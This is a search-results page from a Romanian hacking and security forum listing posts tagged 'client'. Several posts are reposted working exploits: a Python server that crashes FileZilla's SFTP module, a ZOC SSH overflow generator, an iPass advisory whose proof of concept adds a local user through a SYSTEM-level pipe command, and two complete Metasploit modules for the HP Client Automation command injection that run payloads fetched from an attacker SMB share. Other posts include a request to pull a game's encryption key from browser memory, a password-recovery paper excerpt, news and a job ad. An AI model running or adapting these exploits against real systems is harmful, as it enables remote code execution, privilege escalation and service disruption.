Jump to content

Search the Community

Showing results for tags 'client'.

The search index is currently processing. Current results may not be complete.
  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 10 results

  1. Hi guys, i know the title must sound obsolete for ya, but i've seen in the past romanian managed to "hack" a previous version of this game. https://world.triviador.net the security has changed since then, i'm wondering if there's anyone that can still make an xml grabber for it. from what i know, if you search "sharedkey" or "rsapublickey" with a memory viewer through firefox for ex, you can see a huge key. i believe that rsa key is used to encrypt the key used for decrypting the xml. anyway, i have managed to write the actual decryption algorithm for decoding the xml, and maybe for decoding the key too, but i can't get the encrypted key out from the memory of any browser. i'm curious if anyone could do that. =] ~ Cheers ~
  2. # Exploit title: filezilla 3.11.0.2 sftp module denial of service vulnerability # Date: 5-6-2015 # Vendor homepage: http://www.chiark.greenend.org.uk # Software Link: http://dl.filehorse.com/win/file-transfer-and-networking/filezilla/FileZilla-3.11.0.2.exe?st=6b87ZegIN1LDhSGAw5M4wg&e=1434351489&fn=FileZilla_3.11.0.2_win32-setup.exe # Version: 3.11.0.2 # Author: 3unnym00n # Details: # -------- # sftp module for filezilla based on putty's psftp component. # when doing the ssh dh group exchange old style, if the server send a malformed dh group exchange reply, can lead the filezilla component crash # Tested On: win7, xp # operating steps: run the py, then execute : "D:\programfile\FileZilla FTP Client\filezilla.exe" sftp://root@127.0.0.1 ''' import socket import struct soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) soc.bind(('127.0.0.1', 22)) soc.listen(1) client, addr = soc.accept() ## do banner exchange ## send server banner client.send('SSH-2.0-SUCK\r\n') ## recv client banner client_banner = '' while True: data = client.recv(1) if data == '\x0a': break client_banner += data print 'the client banner is: %s'%client_banner.__repr__() ## do key exchange ## recv client algorithms str_pl = client.recv(4) pl = struct.unpack('>I', str_pl)[0] client.recv(pl) ## send server algorithms client.send('000001b4091464f9a91726b1efcfa98bed8e93bbd93d000000596469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000077373682d727361000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e6500000000000000000000000000000000000000000000'.decode('hex')) ## do dh key exchange ## recv dh group exchange request str_pl = client.recv(4) pl = struct.unpack('>I', str_pl)[0] client.recv(pl) ## send dh group exchange group client.send('00000114081f0000010100c038282de061be1ad34f31325efe9b1d8520db14276ceb61fe3a2cb8d77ffe3b9a067505205bba8353847fd2ea1e2471e4294862a5d4c4f9a2b80f9da0619327cdbf2eb608b0b5549294a955972aa3512821b24782dd8ab97b53aab04b48180394abfbc4dcf9b819fc0cb5ac1275ac5f16ec378163501e4b27d49c67f660333888f1d503b96fa9c6c880543d8b5f04d70fe508ffca161798ad32015145b8e9ad43aab48ada81fd1e5a8ea7711a8ff57ec7c4c081b47fab0c2e9fa468e70dd6700f3412224890d5e99527a596ce635195f3a6d35e563bf4892df2c79c809704411018d919102d12cb112ce1e66ebf5db9f409f6c82a6a6e1e21e23532cf24a6e300000001020000000000000000'.decode('hex')) ## recv dh group exchange init str_pl = client.recv(4) pl = struct.unpack('>I', str_pl)[0] client.recv(pl) ## send dh group exchange reply dh_gex_reply_msg = '\x00\x00\x02\x3c' ## pl dh_gex_reply_msg += '\x09' ## padding len dh_gex_reply_msg += '\x21' ## dh gex reply dh_gex_reply_msg += '\x00\x00\xff\xff' ## dh host key len dh_gex_reply_msg += 'A'*600 client.sendall(dh_gex_reply_msg) Source: https://dl.packetstormsecurity.net/1506-exploits/filezilla-dos.txt
  3. """ # Exploit title: ZOC SSH Client v.7.03.0 Buffer overflow vulnerability (SEH) # Date: 20-5-2015 # Vendor homepage: www.emtec.com # Software Link: http://www.emtec.com/cgi-local/download.cgi?what=ZOC7%20(Windows)&link=zoc/zoc7030.exe&ext=html # Author: Dolev Farhi # Details: # -------- # Create a new connection, run the py script and copy the AAAA...string from zoc.txt to clipboard. paste it in the # server address and attempt to connect. """ #!/usr/bin/python filename="zoc.txt" buffer = "\x41" * 97 textfile = open(filename , 'w') textfile.write(buffer) textfile.close() Source
  4. Security vulnerabilities in the Client Management Software FrontRange DSM can be leveraged in attacks against corporate networks. Client management is a very important task in modern enterprise IT environments as all computer systems, whether client or server, should be managed throughout their entire system life cycle. There are many client management software solutions from different vendors that support IT managers and IT administrators in client management tasks like: • inventory • patch management • software deployment • license management As a matter of principle, in order to perform these functions, client management software requires high privileges, usually administrative rights, on the managed client and server systems. Therefore, client management software is an interesting target for attackers as vulnerabilities in this kind of software may be leveraged for privilege escalation attacks within corporate networks. During a penetration test of client and server systems of a corporate network, the SySS GmbH could find multiple security vulnerabilities in the client management software FrontRange Desktop & Server Management (DSM) v7.2.1.2020 [1] that could be successfully exploited in a privilege escalation attack resulting in administrative privileges for the entire Windows domain. Security Assessment During a security assessment of a client system managed with FrontRange DSM, the SySS GmbH found out that the client management solution FrontRange DSM stores and uses sensitive user credentials for required user accounts in an insecure manner which enables an attacker or malware with file system access to a managed client, for example with the privileges of a limited Windows domain user account, to recover the cleartext passwords. The recovered passwords can be used for privilege escalation attacks and for gaining unauthorized access to other client and/or server systems within the corporate network as at least one FrontRange DSM user account needs local administrative privileges on managed systems. FrontRange DSM stores passwords for different user accounts encrypted in two configuration files named NiCfgLcl.ncp and NiCfgSrv.ncp. These configuration files contain encrypted password information for different required FrontRange DSM user accounts (see [2]), for example: • DSM Runtime Service • DSM Distribution Service Privilege Escalation via Client Management Software SySS GmbH | April 2015 • Business Logic Server (BLS) Authentication • Database account The actual number of required FrontRange DSM user accounts depends on the chosen security level during the software installation as Figure 1 illustrates. A limited Windows domain user has read access to these configuration files that are usually stored in the following locations: • %PROGRAMFILES(X86)\NetInst\ NiCfgLcl.ncp (local on a managed client) • %PROGRAMFILES(X86)\NetInst\ NiCfgSrv.ncp (local on a managed client) • \\<FRONTRANGE SERVER>\DSM$\ NiCfgLcl.ncp (remote on a DSM network share) • \\<FRONTRANGE SERVER>\DSM$\ NiCfgSrv.ncp (remote on a DSM network share) An analysis of the used encryption method by the SySS GmbH showed, that the passwords are encoded and encrypted using a hard-coded secret (cryptographic key) contained within the FrontRange DSM executable file NiInst32. exe. Furthermore, the SySS GmbH found out that the process NiInst32.exe, that is executed in the context of a low-privileged user, decrypts and uses some of the user credentials contained in the FrontRange DSM configuration files. Thus, an attacker or malware running in the same low-privileged user context can analyze and control the process NiInst32.exe and in this way gain access to decrypted cleartext passwords. For instance, such an online attack targeting the running process NiInst32.exe can be performed using an application-level debugger like OllyDbg [3] from the perspective of a limited Windows user. Figure 2 exemplarily shows the successful extraction of the decrypted cleartext password of the FrontRange DSM user account DSM Distribution Service. In order to gain ac Read more: https://www.exploit-db.com/docs/36872.pdf
  5. Am facut un client de IRC special pentru canalul #rstforums de pe freenode Trebuie sa va logati cu userul si parola de pe forum (am facut asta pentru a preveni spamul, pentru a sti cine e cine, etc) Trebuie sa aveti instalat .net Framework 4.5 pentru a rula programul. Screenshots: Login form: Main form: Ce stie sa faca: - Logare pe baza forumului - Design frumusel - Sunet la primirea unui mesaj - Iconita din taskbar blinkaie la primirea unui mesaj - Trimiterea mesajului prin apasarea tastei enter in textbox Buguri existente: - Uneori crash la inchiderea programului. - Ferestrele se numesc Form1/Form2, am uitat sa schimb numele. Daca gasiti alte buguri, va rog sa le raportati. Download: IRC Client.exe — RGhost — file sharing Virus scan: https://www.virustotal.com/en/file/aca49cfc58dd5be22e9d2ac25ba08b2e8d66e670fd542a94a27cd7e4b0b0bba6/analysis/1427018283/ Update 1: - va puteti loga cu username-uri care au puncte in ele - notificare cand in user iese/intra/isi schimba nickul
  6. Mogwai Security Advisory MSA-2015-03 ---------------------------------------------------------------------- Title: iPass Mobile Client service local privilege escalation Product: iPass Mobile Client Affected versions: iPass Mobile Client 2.4.2.15122 (Newer version might be also affected) Impact: medium Remote: no Product link: http://www.ipass.com/laptops/ Reported: 11/03/2015 by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench) Vendor's Description of the Software: ---------------------------------------------------------------------- The iPass Open Mobile client for laptops is lightweight and always on. It provides easy, seamless connectivity across iPass, customer, and third-party networks, and allows you to mix and match carrier networks without disrupting your users. The iPass Open Mobile client for laptops allows organizations to provide granular options for how employees connect to iPass Wi-Fi (the iPass Mobile Network), campus Wi-Fi, mobile broadband (3G/4G), Ethernet, and dial, using a single platform to manage all connections. Open Mobile also enables cost and security controls that provide virtual private network (VPN) integration options; mobile broadband 3G/4G usage controls for both data roaming and data usage; endpoint integrity verification that checks the security of the device at the point of connection; and several additional options for setting network connection and restriction policies. Insight into an organizations mobility usage is provided through user and device activity and summary reports as well as mobile broadband usage reports. ----------------------------------------------------------------------- Vendor response: ----------------------------------------------------------------------- "We do not consider this a vulnerability as it is how the product was designed" Business recommendation: ----------------------------------------------------------------------- Disable the iPass service unless really required -- CVSS2 Ratings ------------------------------------------------------ CVSS Base Score: 5.6 Impact Subscore: 7.8 Exploitability Subscore: 3.9 CVSS v2 Vector (AV:L/AC:L/Au:N/C:P/I:C/A:N) ----------------------------------------------------------------------- Vulnerability description: ---------------------------------------------------------------------- The iPass Open Mobile Windows Client utilizes named pipes for interprocess communication. One of these pipes accepts/forwards commands to the iPass plugin subsystem. A normal user can communicate with this pipe through the command line client EPCmd.exe which is part of the iPass suite. A list of available commands can be displayed via "System.ListAllCommands". The iPass pipe provides a "iPass.EventsAction.LaunchAppSysMode" command which allows to execute arbitrary commands as SYSTEM. This can be abused by a normal user to escalate his local privileges. Please note that this issue can also be exploited remotely in version 2.4.2.15122 as the named pipe can also be called via SMB. However according to our information, the pipe is no longer remotely accessible in current versions of the iPass Mobile client. Proof of concept: ---------------------------------------------------------------------- The following EPCmd command line creates a local user "mogwai" with password "mogwai": EPCmd.exe iPass.EventsAction.LaunchAppSysMode c:\windows\system32\cmd.exe;"/c net user mogwai mogwai /ADD;; Disclosure timeline: ---------------------------------------------------------------------- 10/03/2015: Requesting security contact from iPass sales 10/03/2015: Sales responded, will forward vulnerability information to the development 11/03/2015: Sending vulnerability details 11/03/2015: iPass asks which customer we represent 11/03/2015: Responding that we don't represent any iPass customer 12/03/2015: iPass responded, wont fix, says that the product works as designed Advisory URL: ---------------------------------------------------------------------- https://www.mogwaisecurity.de/#lab ---------------------------------------------------------------------- Mogwai, IT-Sicherheitsberatung Muench Steinhoevelstrasse 2/2 89075 Ulm (Germany) info@mogwaisecurity.de Source
  7. BitTorrent apologizes for Epic Scale crypto-miner installed with ?Torrent torrent client with after user outrage BitTorrent apologizes for Epic Scale Bitcoin mining software that users say was shadily installed ?Torrent torrent client, offers an uninstall guide BitTorrent the maker of widely popular ?Torrent torrent client came under severe fire from all quarters for bundling the popular with cryptocurrency mining software with the ?Torrent torrent client. BitTorrent was not only criticised on different websites but also on its own ?Torrent forum with users blasting it for installing the Epic Scale cryptocurrency miner without asking users for permission or warning them about it. Under the unrelenting barrage of criticism, BitTorrent today apologized to its ?Torrent torrent client users. Writing on the ?Torrent forum, a member of BitTorrent staff said that they had paused the installation of Epic Scale software with ?Torrent client. We understand the concerns that have been raised about our partner offer with Epic Scale. Amid user feedback, on Friday, mid-day we paused the offer to allow time for us to do an evaluation. For users who already installed the Epic Scale software with ?Torrent client and want to remove it conventionally, you are requested to visit the uninstall guide site here. BitTorrent also clarified that the Epic Scale software was shipped only with the Windows client and therefore Linux and Mac machines are not affected by this cryptomining software. BitTorrent however tried to muzzle the claims that the software itself was bad and went on to give a detailed reasoning for shadow installing the Epic Scale software. “There have been a lot of claims over the past few days, some of them fair and some pretty wild. We have always invited an open and constructive dialogue, particularly through our forums, and want that to continue.” “As we’ve discussed in the past, partner offers are one of the ways we generate revenue. Many of you already understand that this is a common model for software companies that provide products and technology for free. Our policy is that these offers are strictly optional and we have never done a silent install; in fact, we built our installer technology to make silent installs impossible. The offers we choose and how we present them are something we strive to get right, and we think we’ve been mostly successful over the last four years.” “That being said – from the feedback we’ve received, it is clear that we misjudged how users would react to this offer; this software is truly different from our previous offers and therefore deserves special attention. For this, we unequivocally apologize to our affected users.” The ?Torrent client were however not happy with the apology. A poster on the forum demanded the BitTorrent should permanently stop such installations while another asked BitTorrent to consider the damage it may have cost, “I may ask that for the next set of offers that full testing be done to ensure that zero threats of malware/adware/spyware is given free reign over the client’s system. Meaning, a system set up that a normal person would use with a normal AV program. Once the package is installed, an array of mal/spy/adware cleaners are put to work to see how deep these packages go and how they are treated by the cleaners. This situation would pale in comparision if a genuine threat was unleashed by accident.” SURSA: BitTorrent apologizes for Epic Scale crypto-miner installed with ?Torrent torrent client with after user outrage Se pare ca nu e de la adware si alte programe intalate din greseala fiindca uiti sau nu vezi sa dai uncheck atunci cand instalezi utorrent.
  8. # Exploit Title: Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability # Date: 2014-10-01 # Exploit Author: Ben Turner # Vendor Homepage: Previosuly HP, now http://www.persistentsys.com/ # Version: 7.9, 8.1, 9.0, 9.1 # Tested on: Windows XP, Windows 7, Server 2003 and Server 2008 # CVE-2015-1497 # CVSS: 10 require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # Exploit mixins should be called first include Msf::Exploit::Remote::SMB include Msf::Exploit::EXE include Msf::Auxiliary::Report # Aliases for common classes SIMPLE = Rex::Proto::SMB::Client XCEPT = Rex::Proto::SMB::Exceptions CONST = Rex::Proto::SMB::Constants def initialize super( 'Name' => 'Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability', 'Description' => %Q{ This module exploits PS Client Automation, by sending a remote service install and creating a callback payload. }, 'Author' => [ 'Ben Turner' ], 'License' => BSD_LICENSE, 'References' => [ ], 'Privileged' => true, 'DefaultOptions' => { 'WfsDelay' => 10, 'EXITFUNC' => 'process' }, 'Payload' => { 'BadChars' => '', 'DisableNops' => true }, 'Platform' => ['win'], 'Targets' => [ [ 'PS Client Automation on Windows XP, 7, Server 2003 & 2008', {}] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'January 10 2014' ) register_options([ OptString.new('SMBServer', [true, 'The IP address of the SMB server', '192.168.1.1']), OptString.new('SMBShare', [true, 'The root directory that is shared', 'share']), Opt::RPORT(3465), ], self.class) end def exploit createservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00" createservice << "Nvdkit.exe service install test -path \"c:\\windows\\system32\\cmd.exe /c \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe\"" createservice << "\x22\x00\x00\x00" startservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00" startservice << "Nvdkit service start test" startservice << "\x22\x00\x00\x00" removeservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00" removeservice << "Nvdkit service remove test" removeservice << "\x22\x00\x00\x00" def filedrop() begin origrport = self.datastore['RPORT'] self.datastore['RPORT'] = 445 origrhost = self.datastore['RHOST'] self.datastore['RHOST'] = self.datastore['SMBServer'] connect() smb_login() print_status("Generating payload, dropping here: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe'...") self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}") exe = generate_payload_exe fd = smb_open("\\installservice.exe", 'rwct') fd << exe fd.close self.datastore['RPORT'] = origrport self.datastore['RHOST'] = origrhost rescue Rex::Proto::SMB::Exceptions::Error => e print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n") abort() end end def filetest() begin origrport = self.datastore['RPORT'] self.datastore['RPORT'] = 445 origrhost = self.datastore['RHOST'] self.datastore['RHOST'] = self.datastore['SMBServer'] connect() smb_login() print_status("Checking the remote share: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}") self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}") file = "\\installservice.exe" filetest = smb_file_exist?(file) if filetest print_good("Found, upload was succesful! \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\#{file}\n") else print_error("\\\\#{datastore['SMBServer']}\\#{file} - The file does not exist, try again!") end self.datastore['RPORT'] = origrport self.datastore['RHOST'] = origrhost rescue Rex::Proto::SMB::Exceptions::Error => e print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n") abort() end end begin filedrop() filetest() connect() sock.put(createservice) print_status("Creating the callback payload and installing the remote service") disconnect sleep(5) connect() sock.put(startservice) print_good("Exploit sent, awaiting response from service. Waiting 15 seconds before removing the service") disconnect sleep(30) connect sock.put(removeservice) disconnect rescue ::Exception => e print_error("Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}\n\n") abort() end end end
  9. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'HP Client Automation Command Injection', 'Description' => %q{ This module exploits a command injection vulnerability on HP Client Automation, distributed actually as Persistent Systems Client Automation. The vulnerability exists in the Notify Daemon (radexecd.exe), which doesn't authenticate execution requests by default neither. This module has been tested successfully on HP Client Automation 9.00 over Windows 2003 SP2 and CentOS 5. }, 'Author' => [ 'Ben Turner', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ ['CVE', '2015-1497'], ['ZDI', '15-038'], ['URL', 'https://radiasupport.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features'] ], 'Privileged' => true, 'Platform' => %w{ unix win }, 'DefaultOptions' => { 'WfsDelay' => 10 }, 'Payload' => {'DisableNops' => true}, 'Targets' => [ [ 'HP Client Automation 9.0.0 / Linux', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 466, 'EncoderType' => Msf::Encoder::Type::CmdUnixPerl, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'openssl telnet generic gawk' }, 'BadChars' => "\x27" } } ], [ 'HP Client Automation 9.0.0 / Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 02 2014')) register_options( [ Opt::RPORT(3465) ], self.class) deregister_options('CMDSTAGER::FLAVOR') deregister_options('CMDSTAGER::DECODER') end def check connect sock.put("\x00") # port sock.put("#{rand_text_alphanumeric(4 + rand(3))}\x00") # user ID sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password sock.put("hide\x00") # command res = sock.get_once disconnect if res && res.unpack('C')[0] == 0 return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def exploit case target['Platform'] when 'win' print_status('Exploiting Windows target...') execute_cmdstager({:flavor => :vbs, :linemax => 290}) when 'unix' print_status('Exploiting Linux target...') exploit_unix else fail_with(Failure::NoTarget, 'Invalid target') end end def exploit_unix connect sock.put("\x00") # port sock.put("0\x00") # user ID sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password sock.put("hide hide\x09sh -c '#{payload.encoded.gsub(/\\/, "\\\\\\\\")}'\x00") # command, here commands can be injected disconnect end def execute_command(cmd, opts = {}) connect sock.put("\x00") # port sock.put("S-1-5-18\x00") # user ID sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password sock.put("hide hide\"\x09\"cmd.exe /c #{cmd}&\"\x00") # command, here commands can be injected res = sock.get_once disconnect unless res && res.unpack('C')[0] == 0 fail_with(Failure::Unknown, "Something failed executing the stager...") end end end Source
  10. Level 1 Remote Software & Hardware Support Specialist For a client, Software &Hardware Support Specialists are required to deliver Remote Technical Support Services in English and in client national language • Providing initial remote technical software& hardware support to clients • Interacting with client and company functions consistently until problem solution • Analyzing problems/situations, understanding problem impact on client business • Applying problem solving techniques • Responding to client queries, providing timely resolutions to client issues • Maintaining highest client satisfaction • Maintaining positive client relationships even in severe and pressurized situations • Performing problem management and end-to-end problem ownership • Logging all related activities for each customer query and handling client data securely • Employing client‘s standard support delivery methodologies and tools • Performing in international software support delivery processes and environments • Participating in shifts: 24X7 The team's location is Bucharest/Romania. In an initial phase training will be provided to gain client specific product knowledge and getting used to client's software &hardware support processes and tools. This would be provided in Bucharest. Cerinte Traits and competencies wanted • Technical • Problem solver • Excellent communication and listening skills • Team player • Very good analytical skills • Eagerness/willingness to learn • Ability to perform under pressure • Ability to multi-task • Willingness to travel Skills and experience wanted • Required: • English fluent (both written and verbal) --asta e un must • Proven remote support know-how (patches etc.) Nice to have skills Excellent analytic know-how for complex incidents • Customer facing experience • Team working Location Bucharest pm cv
×
×
  • Create New...